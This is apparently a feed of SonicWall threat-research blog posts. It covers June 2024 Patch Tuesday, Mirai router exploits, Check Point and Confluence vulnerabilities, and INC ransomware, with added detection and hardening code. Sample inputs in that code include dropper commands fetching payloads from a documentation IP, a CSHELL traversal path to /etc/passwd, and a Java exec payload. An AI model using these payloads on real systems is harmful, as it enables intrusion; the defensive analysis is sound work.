Microsoft Security Bulletin Coverage for June 2024

Overview

Microsoft’s June 2024 Patch Tuesday has 49 vulnerabilities, 24 of which are Elevation of Privilege. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of June 2024 and has produced coverage for seven of the reported vulnerabilities.

Vulnerabilities with Detections

CVE | CVE Title | Signature
CVE-2024-30080 | Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability | IPS 4452 Microsoft Message Queuing RCE (CVE-2024-30080)
CVE-2024-30084 | Windows Kernel-Mode Driver Elevation of Privilege Vulnerability | ASPY 6802 Exploit-exe exe.MP_391
CVE-2024-30087 | Win32k Elevation of Privilege Vulnerability | ASPY 6805 Exploit-exe exe.MP_392
CVE-2024-30088 | Windows Kernel Elevation of Privilege Vulnerability | ASPY 6806 Exploit-exe exe.MP_393
CVE-2024-30089 | Microsoft Streaming Service Elevation of Privilege Vulnerability | ASPY 581 Exploit-exe exe.MP_390
CVE-2024-30091 | Win32k Elevation of Privilege Vulnerability | ASPY 580 Exploit-exe exe.MP_389
CVE-2024-35250 | Windows Kernel-Mode Driver Elevation of Privilege Vulnerability | ASPY 579 Exploit-exe exe.MP_388
Release Breakdown

The vulnerabilities can be classified into the following categories:

For June there are one Critical, 48 Important and zero Moderate vulnerabilities.

2024 Patch Tuesday Monthly Comparison

Microsoft tracks vulnerabilities that are being actively exploited at the time of discovery and those that have been disclosed publicly before the Patch Tuesday release for each month. The above chart displays these metrics as seen each month.

Release Detailed Breakdown

Denial of Service Vulnerabilities

CVE-2024-30065 | Windows Themes Denial of Service Vulnerability
CVE-2024-30070 | DHCP Server Service Denial of Service Vulnerability
CVE-2024-30083 | Windows Standards-Based Storage Management Service Denial of Service Vulnerability
CVE-2024-35252 | Azure Storage Movement Client Library Denial of Service Vulnerability
Elevation of Privilege Vulnerabilities

CVE-2024-29060 | Visual Studio Elevation of Privilege Vulnerability
CVE-2024-30064 | Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-30066 | Winlogon Elevation of Privilege Vulnerability
CVE-2024-30067 | WinLogon Elevation of Privilege Vulnerability
CVE-2024-30068 | Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-30076 | Windows Container Manager Service Elevation of Privilege Vulnerability
CVE-2024-30082 | Win32k Elevation of Privilege Vulnerability
CVE-2024-30084 | Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
CVE-2024-30085 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
CVE-2024-30086 | Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
CVE-2024-30087 | Win32k Elevation of Privilege Vulnerability
CVE-2024-30088 | Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-30089 | Microsoft Streaming Service Elevation of Privilege Vulnerability
CVE-2024-30090 | Microsoft Streaming Service Elevation of Privilege Vulnerability
CVE-2024-30091 | Win32k Elevation of Privilege Vulnerability
CVE-2024-30093 | Windows Storage Elevation of Privilege Vulnerability
CVE-2024-30099 | Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-35248 | Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability
CVE-2024-35250 | Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
CVE-2024-35253 | Microsoft Azure File Sync Elevation of Privilege Vulnerability
CVE-2024-35254 | Azure Monitor Agent Elevation of Privilege Vulnerability
CVE-2024-35255 | Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability
CVE-2024-35265 | Windows Perception Service Elevation of Privilege Vulnerability
CVE-2024-37325 | Azure Science Virtual Machine (DSVM) Elevation of Privilege Vulnerability
Information Disclosure Vulnerabilities

CVE-2024-30069 | Windows Remote Access Connection Manager Information Disclosure Vulnerability
CVE-2024-30096 | Windows Cryptographic Services Information Disclosure Vulnerability
CVE-2024-35263 | Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability
Remote Code Execution Vulnerabilities

CVE-2024-30052 | Visual Studio Remote Code Execution Vulnerability
CVE-2024-30062 | Windows Standards-Based Storage Management Service Remote Code Execution Vulnerability
CVE-2024-30063 | Windows Distributed File System (DFS) Remote Code Execution Vulnerability
CVE-2024-30072 | Microsoft Event Trace Log File Parsing Remote Code Execution Vulnerability
CVE-2024-30074 | Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability
CVE-2024-30075 | Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability
CVE-2024-30077 | Windows OLE Remote Code Execution Vulnerability
CVE-2024-30078 | Windows Wi-Fi Driver Remote Code Execution Vulnerability
CVE-2024-30080 | Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
CVE-2024-30094 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30095 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30097 | Microsoft Speech Application Programming Interface (SAPI) Remote Code Execution Vulnerability
CVE-2024-30100 | Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-30101 | Microsoft Office Remote Code Execution Vulnerability
CVE-2024-30102 | Microsoft Office Remote Code Execution Vulnerability
CVE-2024-30103 | Microsoft Outlook Remote Code Execution Vulnerability

Decoding Router Vulnerabilities Exploited by Mirai: Insights from SonicWall’s Honeypot Data

As seen in Cybersecurity Insiders, June 2024.

SonicWall has already successfully defended against 5.8 million Mirai-related attacks in 2024, and we’ve seen a spike in honeypot activity related to Mirai, all aimed at exploiting vulnerabilities in aging router systems. These attacks exhibit striking similarities, a theme we will explore further in subsequent sections of this blog. By understanding the common threads among these exploits, we can better fortify our defenses against future incursions and safeguard our network infrastructure from potential compromise. To facilitate this understanding, SonicWall is committed to continually releasing threat intelligence to ensure the industry has the most complete and updated information related to attacks on small- and medium-sized businesses (SMBs). Our research team has created five signatures across our product portfolio to ensure our customers are protected from this increasing threat.

Mirai is a significant malware threat known for targeting Internet of Things (IoT) devices, such as routers and IP cameras, to form extensive botnets. Emerging in 2016, Mirai exploits weak default credentials and vulnerabilities to compromise devices, granting attackers remote access. These compromised devices are then utilized to orchestrate large-scale Distributed Denial of Service (DDoS) attacks, posing a substantial threat to internet infrastructure worldwide.

Tracing the Path of Mirai’s Evolution

Mirai, created by Paras Jha, Josiah White and Dalton Norman, was crafted to exploit IoT device vulnerabilities for botnet recruitment. It was first detected in August 2016 by MalwareMustDie researchers during a large DDoS attack on Brian Krebs’ cybersecurity site. Mirai’s source code was subsequently released by its creators in September. This release spawned numerous malware iterations, intensifying IoT security concerns. The most memorable incidents included the unprecedented 620 Gbps DDoS attack on KrebsOnSecurity and the October 2016 Dyn cyberattack, which paralyzed internet services for major platforms like Twitter and Netflix. In 2024, SonicWall has already prevented 13.6 million attacks against IoT devices, a 29% increase from 2023.

Mirai operates through a systematic sequence of steps: scanning for vulnerable IoT devices, exploiting weaknesses like default credentials to gain entry, infecting them to form a botnet and launching potent DDoS attacks. It spreads by continuously seeking new targets and adapts dynamically to evade detection and mitigation efforts as explained in Figure 1.

Figure 1: Mirai attack chain

Honeypot Insights

SonicWall’s honeypots found Mirai leveraging exploits for old vulnerabilities in routers from vendors like Zyxel, Netgear, D-Link and TP-Link in order to spread. Let us examine some of the honeypot findings through the similarities in attack patterns.

1. Injection of Commands: Each attack attempts to inject and execute commands on the targeted device. These commands are typically aimed at downloading additional malicious payloads, granting unauthorized access or somehow compromising the device. For example, from a packet captured from our honeypots in Figure 2, wget, chmod and rm commands are injected.

Figure 2: Zyxel USG FLEX 100W Command Injection (CVE-2022-30525)

2. HTTP/HTTPS Requests: All attacks involve HTTP requests to interact with the device’s web interface or execute commands remotely. They manipulate URLs or parameters to exploit vulnerabilities in the target devices. For example, from a packet captured from our honeypots in Figure 3, an HTTP request is made to the device’s GetDeviceSettings endpoint to execute wget and chmod commands.

Figure 3: D-Link Devices HNAP SOAPAction-Header Command Execution CVE-2015-2051

3. Downloading and Executing Scripts: Many attacks found in our honeypots involve downloading additional scripts or binaries onto the device from a remote server and then executing the downloaded package. These scripts often contain malicious payloads aimed at compromising the device’s security or establishing unauthorized access. All of the downloaded scripts we reviewed continue to spread Mirai. For example, from a packet captured from our honeypots in Figure 4, the Mozi.m script is downloaded and executed.

Figure 4: NETGEAR DGN Devices Remote Command Execution

4. Operating System Commands: The commands being executed by Mirai are typically shell commands or scripts intended to manipulate the device’s operating system. They often involve commands like wget, chmod, rm and sh to download scripts, change their permissions and execute them, as in the packet captured from our honeypots shown in Figure 5.

Figure 5: TP-Link Archer AX21 Command Injection CVE-2023-1389

Who Has the Biggest Risk?

Figure 6: Mirai Hits by Industry

Not all industries are affected equally by every attack vector. By digging into the data provided by our over 1 million sensors worldwide, we can determine which industries are the most impacted by the Mirai botnet, as you can see in Figure 6. Real estate and rental businesses appear to be affected the most by Mirai attacks, with the data showing 86.09% of attacks focused on compromising property management systems. The finance and insurance sectors are also taking on a substantial number of attacks, with around 9.65% of attacks focused on the financial sector, potentially exposing sensitive financial data and disrupting online banking services. The wholesale trade (1.88%) and professional, scientific and technical services (1.49%) sectors aren’t immune either, as they can experience supply chain disruptions and compromised networks.

Identification and Mitigation

The recent data seen by both our firewalls and honeypots underscores the urgent need to secure IoT devices to prevent their exploitation for malicious purposes. While each of the mentioned vulnerabilities affects different router products from various manufacturers, some common factors contribute to their susceptibility to exploitation by malware like Mirai. Understanding these factors can assist in preventing and detecting these types of attacks.

  1. Firmware Issues: Many of these vulnerabilities stem from weaknesses in the firmware of the routers. Firmware vulnerabilities can arise due to poor coding practices, insufficient testing or failure to address reported security issues promptly.
  2. Insecure Web Interfaces: Several vulnerabilities involve the routers’ web interfaces, which allow users to configure settings and manage the device. Weaknesses in authentication mechanisms or improper input validation can lead to remote code execution or command injection.
  3. Shell Metacharacters: Exploitation often involves the use of shell metacharacters in user-supplied input fields. These metacharacters allow attackers to manipulate command execution, enabling them to execute arbitrary commands on the router.
  4. Delayed or Lack of Patching: In many cases, vulnerabilities exploited by Mirai and similar malware have been previously disclosed, but routers remain unpatched due to delayed or absent firmware updates. This leaves devices vulnerable to exploitation even after fixes are available.
  5. Default Configurations: Default configurations, including default usernames and passwords, are often targeted by attackers. If users fail to change these default credentials, attackers can easily gain unauthorized access to the router.
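The honeypot patterns described above (shell metacharacters chaining wget, chmod, rm and sh inside a parameter or header, often URL-encoded) can be turned into a simple triage rule for web-interface request logs. The Python below is an added example, not SonicWall’s signature logic or code from this post: the request records are constructed, the regexes are this example’s own heuristic, and 203.0.113.10 is a documentation address standing in for a payload host.

```python
import re
from urllib.parse import unquote_plus

# Constructed honeypot-style request records (not real captures): the request
# line followed by the parameter, header or body fragment that carried the
# injected commands. 203.0.113.0/24 is a documentation range.
SAMPLE_REQUESTS = [
    "POST /cgi-bin/login.cgi username=admin&password=REDACTED",
    "POST /cgi-bin/config mtu=;wget http://203.0.113.10/bot.arm7;chmod 777 bot.arm7;./bot.arm7;rm -rf bot.arm7;",
    'POST /soap/ SOAPAction: "GetSettings/`wget http://203.0.113.10/x.sh -O /tmp/x.sh;chmod 777 /tmp/x.sh`"',
    "GET /cgi-bin/admin?cmd=rm+-rf+/tmp/*;wget+http://203.0.113.10/Mozi.m+-O+/tmp/m;sh+/tmp/m",
    "GET /cgi-bin/locale?country=$(wget%20http%3A%2F%2F203.0.113.10%2Ft.sh%20-O-%7Csh)",
    "GET /status.cgi?view=wget_help",
]

# Shell metacharacters that chain or substitute commands: ; && | || ` $(
# A lone '&' is deliberately excluded because it separates ordinary query parameters.
SHELL_META = re.compile(r";|&&|\|\|?|`|\$\(")
# Commands the observed payloads use to fetch, mark executable and run a stage-2 script
DROPPER_CMDS = re.compile(r"\b(wget|curl|tftp|ftpget|busybox|chmod|rm|sh)\b")
URL_RE = re.compile(r"https?://[^\s;'\"`|&)]+")


def decode_layers(text: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of URL encoding ('+' and %XX); exploits often stack them."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def inspect_request(record: str) -> dict:
    """Flag a request when a shell metacharacter co-occurs with two or more dropper commands."""
    decoded = decode_layers(record)
    commands = sorted({m.group(1) for m in DROPPER_CMDS.finditer(decoded)})
    has_meta = SHELL_META.search(decoded) is not None
    return {
        "request": record,
        "suspicious": has_meta and len(commands) >= 2,
        "commands": commands,
        "download_urls": URL_RE.findall(decoded),
    }


def scan(records=SAMPLE_REQUESTS) -> list:
    """Return only the findings judged suspicious."""
    return [r for r in (inspect_request(x) for x in records) if r["suspicious"]]


def payload_hosts(records=SAMPLE_REQUESTS) -> set:
    """Hosts the flagged requests try to fetch from: candidates for egress blocking or TI lookups."""
    hosts = set()
    for finding in scan(records):
        for url in finding["download_urls"]:
            hosts.add(re.sub(r"^https?://", "", url).split("/")[0])
    return hosts


if __name__ == "__main__":
    for finding in scan():
        print(finding["commands"], finding["download_urls"], finding["request"][:60])
    print("payload hosts:", payload_hosts())
```

The rule requires both a metacharacter and at least two of the dropper commands, so a login form with `&` separators or a parameter that merely contains the word “wget” does not fire; the decoded text is what is matched, which is what defeats the percent-encoded variant.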

To ensure SonicWall customers are prepared for any exploitation that may occur due to these vulnerabilities, the following signatures have been released which can detect and prevent these types of attacks:

  • IPS 18387 D-Link DIR-645 HNAP SOAPAction Header Command Injection
  • IPS 15761 Zyxel USG FLEX 100W Command Injection
  • IPS 13034 NETGEAR DGN Devices Remote Command Execution
  • IPS 15864 TP-Link Archer AX21 Command Injection
  • GAV Mirai

In addition to traditional signatures, Managed Service Providers (MSPs) can significantly enhance protection for small businesses against Mirai botnet attacks. They can deploy the human layer of security to identify attacker behaviors across their networks with full network visibility and proactive threat detection capabilities. By offering a multi-layered defense strategy, MSPs provide small businesses with the expertise and resources needed to defend against evolving cyber threats like the Mirai botnet.

Mirai’s “Mirai” (Future)

The data suggest that Mirai and its variants will continue to evolve, becoming more sophisticated and dangerous. These botnets are likely to incorporate new techniques specifically designed to exploit vulnerabilities in IoT devices, making them even more effective at compromising a wide range of targets. We can also expect these threats to employ advanced evasion tactics to bypass traditional security measures, making detection and mitigation more challenging. Additionally, the target surface for these attacks is expected to broaden significantly, especially as 5G continues to allow more devices with limited reviewed firmware to be network-connected. As technology advances, Mirai is likely to set its sights on emerging technologies, including smart home devices, industrial IoT systems and critical infrastructure.

Protecting against Mirai and similar threats requires a multi-faceted approach. Device manufacturers must prioritize security in their designs, ensuring robust authentication and regular updates. Users need to apply patches promptly to mitigate known vulnerabilities. Implementing network segmentation and strict access controls can limit the impact of Mirai attacks. Behavioral analysis through Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) aids in early detection, while traffic monitoring helps identify Distributed Denial of Service (DDoS) attacks. Managed Service Providers (MSPs) are invaluable in monitoring alerts and identifying these types of attacks. Collaboration through threat intelligence sharing enhances collective defense, and educating users on securing IoT devices is crucial for prevention.

Critical Path Traversal Vulnerability in Check Point Security Gateways (CVE-2024-24919)

Overview

The SonicWall Capture Labs threat research team became aware of an exploited-in-the-wild information disclosure vulnerability affecting the Check Point Security Gateways. Identified as CVE-2024-24919 and given a CVSSv3 score of 8.6, the vulnerability is more severe than it initially appears. While labeled as a sensitive information disclosure vulnerability, it is actually a path traversal attack leading to an arbitrary read, allowing an attacker to read any file on the system. A proof of concept is publicly available on GitHub. To be vulnerable, the gateway needs to have Remote Access VPN or Mobile Access Software Blades enabled. Check Point has made a patch available, and it is advisable to update immediately.

Technical Overview

The flaw is a path traversal bug in the “/clients/MyCRL” endpoint, which can be exploited via manipulated POST requests containing the string “CSHELL/” somewhere in the request. Due to the use of the “strstr” function without proper sanitizing and validation of user input, an attacker can leverage path traversal sequences like “../” within the POST request (Figure 1). This ultimately allows access to sensitive files like /etc/shadow, which contain the password hashes for the system. For our analysis, we used version R80.
Figure 1: Vulnerable Code

To trigger and exploit this vulnerability, an attacker must send a POST request containing the string “CSHELL/” and include a path traversal sequence like “../”. This can be done in Python, as shown in the publicly available PoC and Figure 2 below, where “path” is the file the attacker wants access to.

Figure 2: Creating a POST request to obtain sensitive information

Leveraging this code, we can demonstrate dumping the gateway’s “/etc/shadow” file to obtain the system’s hashed credentials, as seen in Figure 3. An attacker can then attempt to crack these hashes to obtain administrative access to the firewall. The attack is not limited to this file; any file on the system can be read. Note that this is being done against the WAN interface, showing that it is accessible over the Internet.

Figure 3: Dumping Hashed Credentials
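As an added illustration of the flaw class (not Check Point’s code and not the post’s PoC), the Python below contrasts a marker-only substring check followed by a plain path join, the shape the “strstr without sanitizing” description implies, with a resolver that decodes the path, rejects traversal segments and proves that the real path stays under the web root. The temporary web root, the file names and the rule that CSHELL/ must be the path prefix are this example’s own assumptions.

```python
import os
import tempfile
from urllib.parse import unquote

MARKER = "CSHELL/"  # the client-files marker the advisory describes


def unsafe_resolve(base_dir: str, requested: str) -> str:
    """'Before' pattern: a substring test (strstr-style) followed by a plain join.
    Passing the marker check says nothing about where the path ends up."""
    if MARKER not in requested:
        raise ValueError("not a client-files request")
    return os.path.normpath(os.path.join(base_dir, requested))


def safe_resolve(base_dir: str, requested: str) -> str:
    """Hardened version: decode, reject traversal tokens, then prove the real path is inside base."""
    base = os.path.realpath(base_dir)
    if "\x00" in requested:
        raise ValueError("NUL byte in path")
    decoded = requested
    for _ in range(3):                      # peel stacked percent-encoding (%252e -> %2e -> .)
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    parts = decoded.replace("\\", "/").split("/")
    if decoded.startswith("/") or ".." in parts:
        raise ValueError("absolute path or '..' segment rejected")
    if not decoded.startswith(MARKER):      # this example's rule: marker is a prefix, not merely present
        raise ValueError("marker must be the path prefix")
    candidate = os.path.realpath(os.path.join(base, decoded))
    if os.path.commonpath([base, candidate]) != base:   # also catches symlinks pointing outside
        raise ValueError("resolved path escapes base directory")
    return candidate


def check(base_dir: str, requested: str) -> tuple:
    """Convenience wrapper returning ('allowed', path) or ('rejected', reason)."""
    try:
        return ("allowed", safe_resolve(base_dir, requested))
    except ValueError as exc:
        return ("rejected", str(exc))


def build_demo_tree() -> str:
    """Constructed web root: <tmp>/CSHELL/allowed.txt plus a symlink that points outside the root."""
    base = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(base, "CSHELL"))
    with open(os.path.join(base, "CSHELL", "allowed.txt"), "w") as fh:
        fh.write("ok\n")
    os.symlink(os.path.dirname(base), os.path.join(base, "CSHELL", "escape"))
    return base


if __name__ == "__main__":
    root = build_demo_tree()
    for req in ("CSHELL/allowed.txt", "CSHELL/../../etc/passwd",
                "CSHELL/%2e%2e/%2e%2e/etc/passwd", "CSHELL/escape/secret.txt"):
        print(req, "->", check(root, req))
    print("unsafe join resolves to:", unsafe_resolve(root, "CSHELL/" + "../" * 12 + "etc/passwd"))
```

The realpath-plus-commonpath check is the one that matters: the `..` filter alone would still let a symlink inside the root reach outside it, and the decode loop exists because a single `unquote` leaves a double-encoded `%252e` untouched.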

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS: 4440 Check Point Security Gateway Path Traversal

Remediation Recommendations

Check Point’s gateway users are advised to apply the hotfix found in the advisory immediately. Check Point has labeled this a mandatory patch to express the criticality of the fix.

Relevant Links
INC Ransomware Behind Linux Threat

Overview

This week, the SonicWall Capture Labs Research team analyzed a sample of Linux ransomware. The group behind this ransomware, called INC Ransomware, has been active since it was first reported a year ago.

Infection Cycle

The malware is a Linux executable in ELF file format. A quick inspection of its strings revealed command-line arguments that can be passed to this ELF file.

Figure 1: List of Command Line Arguments

Upon execution with the identified parameters, the malware appends “INC” to the names of encrypted files.

Figure 2: Debug Output Using the --debug Option

Figure 3: Encrypted files with “INC” appended file extension

The malware also creates a file named “kill,” a shell script that uses the esxcli utility available in VMware ESXi to list and kill all virtual machine processes when running in an ESXi environment. Since our analysis was not conducted in such an environment, this command resulted in an error because the utility was not found.

Figure 4: Content of the “kill” and delete scripts

Another file created is “delete,” which is a shell script using the ESXi command-line utility vim-cmd to delete all available virtual machines.

Copies of ransom notes were dropped in directories where files were encrypted, consistent with other ransomware behavior.

Figure 5: Contents of “Inc_readme.html” Ransom note

The parameter ‘--motd’ also changed the message of the day (MOTD) on the infected machine to display the ransom note message upon successful login.

Figure 6: Message of the Day shows ransom note message

Visiting the URL in the ransom note led to a blog site listing all supposed victims.

Figure 7: INC Ransom blog site

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: LinuxINC.RSM(Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

For further details, visit the official man page for MOTD.
SonicWall Elevate 2024: Ready for the Next Level

It’s Time to Elevate

SonicWall’s current business momentum has been fueled by growth in its partner community. As part of our continued commitment to our partners, we’ve recently added Cloud Secure Edge and Managed Security Services to our lineup. And at RSA Conference this year, we unveiled SonicPlatform, which unifies all SonicWall products under a singular, integrated interface to streamline management tasks and foster deeper integration for our MSPs and MSSPs.  

At Elevate 2024, we’re excited to share an ultimate in-depth look at our recent evolution as well as show exclusive previews of SonicWall’s elevated corporate roadmap. You won’t want to miss out on Elevate 2024 and the unique opportunity to network, learn and strategize.   

What’s in Store for Elevate ’24?

SonicWall is committed to providing meaningful initiatives to its partners and it’s starting to pay dividends. Great success starts with good support — and SonicWall’s Elevate 2024 partner event is all about what we can do to support you! Join us for:  

  • Personalized meetings with SonicWall executives, thought leaders and product experts 
  • Exclusive demonstrations of our latest technological advancements, including Cloud Secure Edge 
  • A sneak peek at how our recent acquisitions can help grow and diversify your business 
  • A preview of upcoming network security solutions  
  • An interactive learning experience about minimizing alert fatigue and leveraging opportunities with SonicWall MDR’s 24×7 SOC protection 
  • Breakout sessions, workshops, and Q&A to boost your knowledge and skills 

And that’s not all. Networking events and receptions will offer a chance to network, share stories and exchange success tips with other business leaders! 

Connect With the SonicWall Team

Don’t miss the chance to interact with our executive leaders. These industry veterans are eager to engage with you and share valuable insights. Our team includes: 

  • Bob VanKirk, President and CEO
  • Jason Carter, Chief Revenue Officer   
  • Michael Crean, EVP of Managed Services   
  • Michelle Ragusa-McBain, VP of Global Channel   
  • Chandro Prasad, EVP Product Management and Product Marketing   
  • Christine Bartlett, Chief Marketing Officer   
  • Tarun Desikan, VP of Cloud Security   
  • Osca St. Marthe, EVP Solution Engineers, Sales & Partner Enablement   
  • Ryan Matlock, Chief Customer Success Officer   

Get Ready for an Elevated Experience!

Join us in Dallas, USA, from June 12-14, 2024, Lisbon, Portugal, from June 26-28, 2024, or Bali, Indonesia from July 10-12, 2024, by registering on our Elevate 2024 portal. You can find registration links and the agendas for each event in the table below. We look forward to seeing you there! For more information about Elevate 2024, contact us or visit the Elevate homepage.

Elevate 2024 Agendas and Registration
Event | Dates
Dallas, USA | June 12-14, 2024
Lisbon, Portugal | June 26-28, 2024
Bali, Indonesia | July 10-12, 2024

Confluence Data Center and Server Remote Code Execution Vulnerability

Overview

The SonicWall Capture Labs threat research team became aware of a remote code execution vulnerability in Atlassian Confluence Data Center and Server, assessed its impact and developed mitigation measures. Confluence Server is software for managing documentation and knowledge bases, with a ubiquitous presence across the globe. Identified as CVE-2024-21683, Confluence Data Center and Server before versions 8.9.1 (Data Center only), 8.5.9 LTS and 7.19.22 LTS allows an authenticated threat actor with the privilege of adding new macro languages to execute arbitrary code, earning a high CVSS score of 8.3. Confluence users are encouraged to upgrade their instances to the latest fixed version, as mentioned by the vendor in the advisory.

Technical Overview

This vulnerability arises due to a flaw in the input validation mechanism in the ‘Add a new language’ function of the ‘Configure Code Macro’ section. This function allows users to upload a new code block macro language definition to customize formatting and syntax highlighting. It expects a JavaScript file formatted according to the custom brush syntax. Insufficient validation allows the authenticated attacker to embed malicious Java code in the file, such as java.lang.Runtime.getRuntime().exec("touch /tmp/poc"), which will be executed on the server.

Triggering the Vulnerability

Leveraging the vulnerability mentioned above requires the attacker to meet the below prerequisites.

  1. The attacker must have network access to the target vulnerable system.
  2. The attacker must have the privilege to add new macro languages.
  3. The forged JavaScript language file containing malicious Java code needs to be uploaded via Configure Code Macro > Add a new language.

The following steps will walk through the process of exploitation and the measures taken to address the vulnerability in the updated version. We used Confluence versions 8.5.0 and 8.5.9 in our tests.

To begin with, the attacker uploads the language file containing malicious Java code (similar to the one mentioned above) on the page seen in Figure 1.

Figure 1: Add a new language page

The payload will be sent for evaluation to the ‘parseLanguage’ method of the ‘RhinoLanguageParser’ class, which can be found at the below location:

WEB-INF/atlassian-bundled-plugins/com.atlassian.confluence.ext.newcode-macro-plugin-5.0.1.jar!/com/atlassian/confluence/ext/code/languages/impl/RhinoLanguageParser.class

The ‘script’ variable will be formed and the ‘evaluateString’ method will process the payload, as illustrated in Figure 2.

Figure 2: Payload evaluation by RhinoLanguageParser

If we step into the function, the ‘evaluateString’ method passes control on to the ‘doTopCall’ method of the ‘ScriptRuntime’ class, as seen in Figure 3. So far, the behavior of both the vulnerable and fixed versions is identical.

Figure 3: Execution of the payload by ScriptRuntime class

The result of executing the ‘doTopCall’ method (shown in Figure 3) differs between the vulnerable and fixed versions. In the fixed version (8.5.9), ‘doTopCall’ throws a ‘RhinoException’; control jumps directly to line 92 and the ‘evaluateString’ method of the ‘RhinoLanguageParser’ class terminates abruptly, as seen in Figure 4. Thanks to enhanced checks, Java references in the uploaded file are blocked and the exception message reads ‘java is not defined’.

Figure 4: Abruptly terminated execution in fixed version

On the other hand, the vulnerable version (8.5.0) allows the execution of the ‘doTopCall’ and hence enables the execution of the ‘evaluateString’ method of the ‘RhinoLanguageParser’ class. It also throws the ‘InvalidLanguageException’ later on, but only after executing the injected malicious Java code as seen in Figure 5.

Figure 5: Malicious code execution in a vulnerable version

Although both the vulnerable and fixed versions of the Confluence server display similar errors on the GUI, as seen in Figure 6, the damage has already been done in the vulnerable version.

Figure 6: Common error on GUI
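Since the fix works by making the evaluator refuse Java references (‘java is not defined’), an administrator who cannot upgrade immediately can screen uploaded language definitions for the same thing before they ever reach the parser. The Python below is an added example, not Atlassian’s parser or code from this post: it strips comments and string literals from a constructed brush file and reports member chains rooted at the Rhino bridge names java, javax and Packages (that root list is this example’s assumption). It is a defence-in-depth check only; the evaluator restriction in 8.5.9 is the actual fix.

```python
import re

# Top-level names through which Rhino exposes the Java package tree to scripts
# (assumed list for screening purposes). A syntax-highlighting brush never needs them.
BRIDGE_ROOTS = ("Packages", "javax", "java")

COMMENT_RE = re.compile(r"/\*.*?\*/|//[^\n]*", re.S)
STRING_RE = re.compile(r"'(?:\\.|[^'\\])*'|\"(?:\\.|[^\"\\])*\"")
MEMBER_CHAIN_RE = re.compile(
    r"\b(" + "|".join(BRIDGE_ROOTS) + r")(?:\s*\.\s*[A-Za-z_$][\w$]*)+"
)

# Constructed benign brush in the SyntaxHighlighter style: the word 'java' appears
# only inside a string literal and a comment, so it must not be flagged.
BENIGN_BRUSH = """
SyntaxHighlighter.brushes.Demo = function() {
  var keywords = 'class public static java void';  // 'java' inside a string: fine
  this.regexList = [
    { regex: /#.*$/gm, css: 'comments' },
    { regex: new RegExp(this.getKeywords(keywords), 'gm'), css: 'keyword' }
  ];
};
SyntaxHighlighter.brushes.Demo.prototype = new SyntaxHighlighter.Highlighter();
"""

# Constructed brush carrying the payload shape quoted in the post.
MALICIOUS_BRUSH = """
SyntaxHighlighter.brushes.Evil = function() {
  java.lang.Runtime.getRuntime().exec("touch /tmp/poc");
  this.regexList = [];
};
"""


def strip_literals(source: str) -> str:
    """Blank out comments and string literals so that 'java' in a keyword list is not a hit."""
    without_comments = COMMENT_RE.sub(" ", source)
    return STRING_RE.sub('""', without_comments)


def find_java_bridge_refs(source: str) -> list:
    """Return every member chain rooted at a Java bridge name, e.g. 'java.lang.Runtime.getRuntime'."""
    code = strip_literals(source)
    return [m.group(0) for m in MEMBER_CHAIN_RE.finditer(code)]


def screen_upload(source: str) -> tuple:
    """(accepted, findings): reject the file if any bridge reference is present."""
    findings = find_java_bridge_refs(source)
    return (len(findings) == 0, findings)


if __name__ == "__main__":
    for name, brush in (("benign", BENIGN_BRUSH), ("malicious", MALICIOUS_BRUSH)):
        print(name, "->", screen_upload(brush))
```

Stripping literals first matters because a brush legitimately lists language keywords (including “java”) as strings; the chain regex then only sees real identifier access. A static screen like this is bypassable by indirection inside the script, which is why it complements, rather than replaces, an evaluator that does not expose the bridge at all.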

Exploitation

The exploitation of this vulnerability yields the remote threat actor the ability to execute arbitrary code on the server. It has a high impact on the confidentiality, integrity and availability of the system and does not require user interaction.

To achieve the remote code execution, the forged JavaScript language file with crafted payload needs to be uploaded, which will form a request as seen in the top portion of Figure 7. This request will generate a file ‘/tmp/poc’ as mentioned in the payload, as seen in the bottom portion of Figure 7.

Figure 7: Malformed request (above) and RCE in vulnerable instance (below)

Additionally, the payload can be modified to yield a reverse shell as seen in Figure 8.

Figure 8: Achieving reverse shell

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS: 4437 Atlassian Confluence Data Center and Server RCE
  • IPS: 4438 Atlassian Confluence Data Center and Server RCE 2

Remediation Recommendations

Considering Confluence Server’s pivotal role in maintaining an organization’s knowledge base, users are strongly encouraged to upgrade their instances to the latest versions, as mentioned in the vendor advisory.

Relevant Links

Better Together: Integrating Microsoft Sentinel with SonicWall Firewalls

Getting Started

As cyber threats continue to evolve, organizations need robust security solutions to detect, respond to and prevent incidents. Microsoft Sentinel, a cloud-native Security Information and Event Management (SIEM) solution, provides intelligent security analytics and threat intelligence across the enterprise. SonicWall Next-Generation Firewalls (NGFWs), on the other hand, are a trusted network security solution that protects your network from external threats. Integrating these two products can significantly enhance your security operations.

Understanding Microsoft Sentinel and SonicWall Firewalls:

Microsoft Sentinel
